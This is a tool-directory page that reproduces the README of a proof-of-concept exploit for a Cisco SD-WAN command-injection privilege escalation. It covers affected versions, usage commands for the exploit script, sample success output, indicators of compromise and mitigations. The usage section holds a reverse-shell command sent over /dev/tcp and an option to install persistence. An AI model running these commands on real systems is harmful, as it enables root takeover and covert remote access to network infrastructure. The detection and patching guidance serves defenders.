Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Tools/GitHubGitHub/fevar54/cve-2026-20245---cisco-sd-wan-privilege-escalation-exploit
Privilege EscalationVulnerability AnalysisExploitationWeb Application ExploitationNetwork SecurityPenetration TestingCommand and ControlLearning & Education
GitHubfevar54/cve-2026-20245---cisco-sd-wan-privilege-escalation-exploit

CVE-2026-20245---Cisco-SD-WAN-Privilege-Escalation-Exploit

**Este código es SOLO para fines educativos y pruebas de seguridad autorizadas.**

View Repository
3133 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2026-20245 - Cisco SD-WAN Privilege Escalation Exploit

Security Rating CVSS CISA KEV

⚠️ WARNING

This code is ONLY for educational purposes and authorized security testing.

📋 Description

CVE-2026-20245 is a privilege escalation vulnerability in the CLI of Cisco Catalyst SD-WAN Controller (vSmart), Cisco Catalyst SD-WAN Manager (vManage), and Cisco Catalyst SD-WAN Validator (vBond). An authenticated attacker with netadmin privileges can execute arbitrary commands as root by uploading a specially crafted file.

Technical Details

FieldValue
CVECVE-2026-20245
CVSS7.8 (High)
VectorAV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
ComponentCLI / CSV Upload
TypeCommand Injection (CWE-116)

🎯 Affected Versions

ProductVulnerable Versions
Cisco Catalyst SD-WAN Manager< 20.18.3.1
Cisco Catalyst SD-WAN Controller (vSmart)< 20.18.3.1
Cisco Catalyst SD-WAN Validator (vBond)< 20.18.3.1

Specific vulnerable versions:

  • 20.9.x (all)
  • 20.10.x - 20.12.5.3
  • 20.12.6 - 20.12.6.1
  • 20.12.7
  • 20.13.x - 20.15.4.3
  • 20.15.5 - 20.15.5.1
  • 20.16.x - 20.18.2.1

🔧 Installation

# Clone repository
git clone https://github.com/username/CVE-2026-20245-PoC
cd CVE-2026-20245-PoC

# Install dependencies
pip install -r requirements.txt

# Grant permissions
chmod +x exploit.py
📦 Dependencies
txt
requests>=2.31.0
🚀 Usage
Check version
bash
python3 exploit.py -t 192.168.1.1 -u netadmin -p password --check-only
Execute command
bash
python3 exploit.py -t 192.168.1.1 -u netadmin -p password -c "id"
Reverse shell
bash
python3 exploit.py -t 192.168.1.1 -u netadmin -p password -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"
Install persistence
bash
python3 exploit.py -t 192.168.1.1 -u netadmin -p password -c "whoami" --persist
🔍 Expected Output
text
╔═══════════════════════════════════════════════════════════════════╗
║  CVE-2026-20245 - Cisco SD-WAN Privilege Escalation Exploit     ║
║  Command Injection via Crafted File Upload                       ║
║  CVSS: 7.8 (High) | CISA KEV: 2026-06-09                        ║
╚═══════════════════════════════════════════════════════════════════╝

[*] Authenticating to 192.168.1.1...
[+] Authentication successful
[+] XSRF Token obtained
[*] Attempting to execute: id
[*] Trying endpoint: /system/device/upload
[*] Uploading malicious file...
[+] File uploaded successfully
[*] Triggering command injection...
[+] Trigger response: 200
[+] Command injection successful via /system/device/upload

============================================================
[✓] EXPLOIT SUCCESSFUL
[✓] Command executed as root
[!] System is VULNERABLE - Apply Cisco patch immediately
============================================================
🔍 Indicators of Compromise (IOCs)
Check logs (/var/log/scripts.log)
bash
# Search for suspicious activity
grep -E "\.csv|malicious|upload_serial" /var/log/scripts.log

# Specific commands to look for
Apr 15 09:44:57 vmanage vScript: /usr/bin/vconfd_script_upload_tenant_list.sh -cli path /home/admin/malicious.csv
Suspicious files
/home/admin/*.csv (unauthorized CSV files)

/tmp/*.csv

/var/log/scripts.log with unusual entries

Processes
bash
# Look for unusual root processes
ps aux | grep -E "bash|sh|nc|ncat|socat"
🛡️ Mitigation
Option 1 - Update to fixed version (RECOMMENDED)
Version	Fixed Release
20.18.2.1 and earlier	20.18.3.1
Option 2 - Limit access
Restrict administrative access to the management network

Use multi-factor authentication

Monitor CSV upload activity

Option 3 - Secure configuration
text
# Disable upload of serial numbers if not necessary
no feature upload-serial-numbers

# Restrict netadmin privileges
admin privilege restrict
📚 References
Cisco Security Advisory

NVD - CVE-2026-20245

CISA KEV Catalog

📊 Timeline
Date	Event
2026-05-14	Cisco publishes initial advisory
2026-06-04	CVE officially published
2026-06-09	CISA adds to KEV
2026-06-23	CISA deadline to patch
⚖️ Disclaimer
This software is provided "as is", without warranties. The author is not responsible for misuse. Use only on authorized systems.
Download Tool